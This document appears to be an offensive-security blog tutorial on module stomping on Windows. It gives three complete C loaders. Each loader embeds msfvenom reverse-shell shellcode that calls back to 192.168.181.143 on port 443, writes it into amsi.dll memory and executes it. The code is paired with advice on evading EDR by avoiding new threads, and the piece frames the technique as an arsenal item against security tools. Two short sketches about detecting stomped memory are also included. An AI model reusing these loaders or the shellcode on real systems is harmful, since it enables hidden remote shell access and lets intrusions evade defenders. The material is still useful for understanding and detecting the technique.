Tradecraft Improvement 2 - Module Stomping
Introduction
In the second installment of the tradecraft improvement series we will discuss a very common technique used when running or injecting shellcode in memory. Most of the time, when we inject shellcode directly into the memory of the current process or a remote process, it shows up as an unbacked memory region, meaning there is no file on disk that the memory originates from. This will raise suspicion if the thread's memory is inspected.
There are a lot of techniques available to solve this problem. The most common of them is Module Stomping. In this technique the attacker loads a benign DLL into the current process or a remote process and writes the shellcode into that DLL's memory. As a result, when the shellcode is executed, it appears to originate from the loaded benign DLL.
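To make the backed versus unbacked distinction concrete: on Windows, VirtualQuery fills a MEMORY_BASIC_INFORMATION structure whose Type field reports MEM_IMAGE for memory mapped from an executable image, MEM_MAPPED for other mapped sections, and MEM_PRIVATE for private allocations such as those made with VirtualAlloc. The sketch below is only an illustration and is not part of the original code. The helper name describe_region_type and the REGION_ constants are hypothetical; the constants simply repeat the winnt.h values so that the block compiles without windows.h.

```c
/* Values of the Type field of MEMORY_BASIC_INFORMATION as defined in
   winnt.h. They are redefined here under hypothetical REGION_ names so
   that this sketch does not depend on windows.h. */
#define REGION_MEM_PRIVATE 0x20000UL
#define REGION_MEM_MAPPED  0x40000UL
#define REGION_MEM_IMAGE   0x1000000UL

/* Hypothetical helper: map a region type to the label an analyst would
   care about when looking at the start address of a thread. */
const char *describe_region_type(unsigned long type)
{
    switch (type) {
    case REGION_MEM_IMAGE:
        return "image-backed (module on disk)";
    case REGION_MEM_MAPPED:
        return "mapped section (not an image)";
    case REGION_MEM_PRIVATE:
        return "private (unbacked)";
    default:
        return "unknown";
    }
}
```

A region allocated with VirtualAlloc falls into the private case, while an address inside a DLL loaded with LoadLibraryA falls into the image-backed case, which is the difference a tool such as Process Hacker surfaces when it resolves a thread's start address to a module.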
Steps Required to use Module Stomping
- First we load a benign DLL from the disk
- We get the entry point of the DLL
- Using the entry point we choose an arbitrary point inside the DLL where we will be writing our shellcode to
- Make sure that the DLL is large enough to hold our shellcode
- Execute the shellcode inside the DLL by either creating a new thread or directly executing the shellcode from the pointer
Checking a normal in-memory shellcode runner
First we will look at what happens when we inject shellcode directly into the memory of the process.
For this test we will use a conventional shellcode injection program.
#include <stdio.h>
#include <windows.h>
#include <stdlib.h>
typedef LPVOID (WINAPI *VirtualAlloc_t)(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
typedef HANDLE (WINAPI *CreateThread_t)(
LPSECURITY_ATTRIBUTES lpThreadAttributes,
SIZE_T dwStackSize,
LPTHREAD_START_ROUTINE lpStartAddress,
__drv_aliasesMem LPVOID lpParameter,
DWORD dwCreationFlags,
LPDWORD lpThreadId
);
//msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.181.143 LPORT=443 -f c EXITFUNC=thread
unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00\x01\xbb\xc0\xa8\xb5\x8f\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";
size_t payloadsize = sizeof(shellcode);
int main()
{
VirtualAlloc_t VirtualAlloc_p = (VirtualAlloc_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAlloc");
CreateThread_t CreateThread_p = (CreateThread_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "CreateThread");
LPVOID ptr = VirtualAlloc_p(NULL, payloadsize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(ptr, shellcode, payloadsize);
//pause to inspect
getchar();
HANDLE hThread = CreateThread_p(0, 0, (LPTHREAD_START_ROUTINE)ptr, NULL, 0, 0);
if (hThread == NULL)
{
printf("Error Creating thread\n");
return -1;
}
printf("Thread Created\n");
getchar();
WaitForSingleObject(hThread, INFINITE);
return 0;
}
- This is a normal shellcode injection which allocates an RWX memory region and then copies the shellcode into that memory region
- Then it will start a new thread to execute the shellcode
- Compile this code and run it
- This shellcode will spawn a reverse shell on our netcat listener
- Once the code pauses, inspect it using Process Hacker
- Once the thread is created, inspect the process
- We will see that there is a strange address in the call stack of the thread, which is not backed by any module
- Furthermore, inspecting this strange memory address, we will find our shellcode loaded in an RWX memory region
- Now our aim is to make sure that the origin of the shellcode looks as if it is from a legitimate module
Implementing Module Stomping
The following code implements module stomping.
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
typedef LPVOID (WINAPI *VirtualAlloc_t)(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
typedef BOOL (WINAPI *VirtualProtect_t)(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flNewProtect,
PDWORD lpflOldProtect
);
typedef HANDLE (WINAPI *CreateThread_t)(
LPSECURITY_ATTRIBUTES lpThreadAttributes,
SIZE_T dwStackSize,
LPTHREAD_START_ROUTINE lpStartAddress,
__drv_aliasesMem LPVOID lpParameter,
DWORD dwCreationFlags,
LPDWORD lpThreadId
);
unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00\x01\xbb\xc0\xa8\xb5\x8f\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";
size_t payloadsize = sizeof(shellcode);
int main()
{
VirtualAlloc_t VirtualAlloc_p = (VirtualAlloc_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAlloc");
VirtualProtect_t VirtualProtect_p = (VirtualProtect_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualProtect");
CreateThread_t CreateThread_p = (CreateThread_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "CreateThread");
//Load the library to inject code into
HMODULE lib = LoadLibraryA("C:\\Windows\\System32\\amsi.dll");
printf("Address of library : %p\n", lib);
SetLastError(0);
if (lib != NULL)
{
//Finding a location inside the DLL to write the shellcode to
PDWORD libPtr = lib + 2*4096;
printf("Address : %p\n", libPtr);
DWORD temp = 0;
//Change memory protection before writing the shellcode
VirtualProtect_p(libPtr, payloadsize , PAGE_READWRITE, &temp);
memcpy(libPtr, shellcode, payloadsize);
//adjust the protection as before
VirtualProtect_p(libPtr, payloadsize , temp,&temp);
//start a new thread
HANDLE hThread = CreateThread_p(0, payloadsize, (LPTHREAD_START_ROUTINE)libPtr, NULL, 0, 0);
if(hThread == NULL)
{
printf("Thread not created\n");
}
}
printf("Attach here\n");
getchar();
return 0;
}
- In order to implement module stomping we first need to find a DLL that is large enough to hold our shellcode and looks benign at the same time
- For this reason I have decided to use amsi.dll (got the idea from iredteam)
- The DLL is loaded using LoadLibraryA
- Next we select a region inside the module where we can easily write our shellcode
PDWORD libPtr = lib + 2*4096;
- Then adjust the memory permissions to PAGE_READWRITE so that we are able to copy our shellcode there
VirtualProtect_p(libPtr, payloadsize , PAGE_READWRITE, &temp);
- Use memcpy to copy the shellcode to the selected memory region inside the module
memcpy(libPtr, shellcode, payloadsize);
- Once the shellcode is copied, restore the original permissions of that memory region
- Now use the CreateThread API to execute the shellcode in a new thread
- The start location of the new thread should be the selected location inside the module
HANDLE hThread = CreateThread_p(0, payloadsize, (LPTHREAD_START_ROUTINE)libPtr, NULL, 0, 0);
- This will give us a reverse shell on our listener
Executing the payload
- Compile and run the code, then attach to it using x64Dbg
- Go to the memory region that is displayed by the program
- We will find our shellcode in that memory region
- Now checking Process Hacker, we will find that there is a new thread originating from amsi.dll
- This can be confirmed if we follow the memory map in x64Dbg
- We will see that this memory address is inside amsi.dll
- We will also get our reverse shell on our listener
A few areas for improvement
Even though this technique works just fine, we can still improve upon it.
Executing the shellcode in the main thread
- You must have noticed that we use the CreateThread API to create a new thread in order to execute the shellcode
- Doing so results in the creation of a new thread, which might be covered by the detection rules of the EDR system in use
- A subtle change that solves this is to use a function pointer.
void (*run)() = (void (*)()) libPtr; run();
- Here we create a pointer to a function that takes no arguments. This function points to the start address of the shellcode
- Then we call that function to execute the shellcode
- Doing so will result in executing the shellcode in the main thread instead of a new thread being created
Our final code should look as follows
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
typedef LPVOID (WINAPI *VirtualAlloc_t)(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
typedef BOOL (WINAPI *VirtualProtect_t)(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flNewProtect,
PDWORD lpflOldProtect
);
typedef HANDLE (WINAPI *CreateThread_t)(
LPSECURITY_ATTRIBUTES lpThreadAttributes,
SIZE_T dwStackSize,
LPTHREAD_START_ROUTINE lpStartAddress,
__drv_aliasesMem LPVOID lpParameter,
DWORD dwCreationFlags,
LPDWORD lpThreadId
);
unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00\x01\xbb\xc0\xa8\xb5\x8f\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";
size_t payloadsize = sizeof(shellcode);
int main()
{
VirtualAlloc_t VirtualAlloc_p = (VirtualAlloc_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAlloc");
VirtualProtect_t VirtualProtect_p = (VirtualProtect_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualProtect");
CreateThread_t CreateThread_p = (CreateThread_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "CreateThread");
//Load the library to inject code into
HMODULE lib = LoadLibraryA("C:\\Windows\\System32\\amsi.dll");
printf("Address of library : %p\n", lib);
SetLastError(0);
if (lib != NULL)
{
//Finding a location inside the DLL to write the shellcode to
PDWORD libPtr = lib + 2*4096;
printf("Address : %p\n", libPtr);
DWORD temp = 0;
//Change memory protection before writing the shellcode
VirtualProtect_p(libPtr, payloadsize , PAGE_READWRITE, &temp);
memcpy(libPtr, shellcode, payloadsize);
//adjust the protection as before
VirtualProtect_p(libPtr, payloadsize , temp,&temp);
//start a new thread
/*
HANDLE hThread = CreateThread_p(0, payloadsize, (LPTHREAD_START_ROUTINE)libPtr, NULL, 0, 0);
if(hThread == NULL)
{
printf("Thread not created\n");
}
*/
void (*run)() = (void (*)()) libPtr; run();
}
printf("Attach here\n");
getchar();
return 0;
}
- Compile and run the code
- Here we will see that no new thread is being created; instead, the main thread now has amsi.dll on its call stack
- This is where the shellcode is getting executed from
- The main drawback of this approach is that, since the shellcode is executed on the main thread, if the shellcode exits, our main process will also stop
- If the main thread is killed for some reason, the payload will become a zombie process
Complete Thread Stack Spoofing
- In case of module stomping we are just loading a new module from the disk and writing our shellcode to its memory
- This might raise some alerts and can be fingerprinted
- To solve this one can re-write the thread stack for the unbacked memory regions in order to make them look legit.
- If implemented properly without any errors this can be difficult to catch.
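One reason module stomping can be fingerprinted is that the stomped pages no longer match the DLL file on disk, so a scanner can compare a section as it appears in memory against the same section read from the file. The sketch below shows only the comparison step on two plain buffers. The function name count_modified_bytes is hypothetical, obtaining the two buffers is left out, and a real tool would also have to allow for legitimate differences such as relocations applied by the loader.

```c
#include <stddef.h>

/* Hypothetical helper: count the bytes that differ between a section as
   it appears in memory and the same section as read from the file on
   disk. If first_diff is not NULL it receives the offset of the first
   mismatch, or len when the two buffers are identical. */
size_t count_modified_bytes(const unsigned char *in_memory,
                            const unsigned char *on_disk,
                            size_t len,
                            size_t *first_diff)
{
    size_t modified = 0;
    size_t first = len;

    for (size_t i = 0; i < len; i++) {
        if (in_memory[i] != on_disk[i]) {
            if (modified == 0)
                first = i;      /* remember where the first change starts */
            modified++;
        }
    }
    if (first_diff != NULL)
        *first_diff = first;
    return modified;
}
```

A large run of modified bytes inside an executable section of an otherwise unmodified system DLL is the kind of signal this comparison would surface.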
Hunting for code caves inside DLLs
- If the shellcode is very large, one needs to look for appropriate locations inside the DLL to write the shellcode to
- Also one needs to check that the loaded DLL is large enough to accommodate the shellcode
Conclusions
This was an introduction to basic module stomping. There are a lot of improvements that can be made to this technique. It is a great technique to add to one's adversarial arsenal for use against security solutions.
Check out my source code for this part: https://github.com/dosxuz/TradecraftImrprovement/tree/main/Part-2
References
- https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection
- https://medium.com/@Breadman602/breadman-module-stomping-api-unhooking-using-native-apis-b10df89cc0a2